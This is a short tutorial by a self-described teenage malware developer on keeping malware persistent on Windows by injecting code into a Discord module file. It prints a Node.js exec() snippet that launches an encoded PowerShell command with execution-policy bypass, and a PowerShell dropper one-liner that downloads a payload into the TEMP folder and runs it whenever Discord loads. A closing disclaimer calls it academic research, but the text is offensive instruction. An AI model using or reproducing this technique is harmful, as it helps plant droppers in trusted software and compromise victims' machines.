Malware Persistence Using Discord
Learn How To Do Malware Persistence Using Discord!
Hello,I’m R00T,14 Years old Malware Developer
Used To Code Malware in C++ & C# & PowerShell.
Let’s Get into The Main Point!
Malware persistence consists of techniques used to maintain access to systems across restarts.
Like Registry Startup in Windows, Or CronJobs in Linux, it will be Detected as soon the victim checks for any StartUp Applications, and Today I will explain a sneaky way to Do Malware persistence, In Windows Systems.
First Of All, i have Seen Multiple Token Grabbers ( Discord Token Stealers) That use Discord Modules to Grab Discord Token Using it, So I was learning NodeJs for a while , i coded a basic Dropper , in NodeJs, will be injected To Any Discord Module File
So, I Selected To Work With
C:\Users\MrRoot\AppData\Local\Discord\app-1.0.9004\modules\discord_voice-4\discord_voice\index.jsTo Append The Code Into it, The Code Was Basically an exec() Function that executes commands, and the command was one-liner PowerShell dropper, with execution restrictions bypass.
The Dropper Was Sending A Basic Message To my WebHook :
The Code Was To check if everything was executed correctly
The Code Was :
const { exec } = require("child_process");
exec("powershell -exec bypass -EncodedCommand Base64EncodedPowerShellCommand", (error, stdout, stderr) => {
if (error) {
return;
}
if (stderr) {
return;
}
});The Power Shell Dropper Was :
$path = $env:TEMP + "\payload.exe"; Invoke-WebRequest FileLink -Outfile $path;start $pathAfter Appending The Code , When Discord Start, or The User Press Ctrl+R ( Refreshing Discord ) , it will load the module , so it will load the malware.
Thanks For Reading!
This Article & Code has been created purely for the purposes of academic research. It is not intended to be used to attack other systems. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
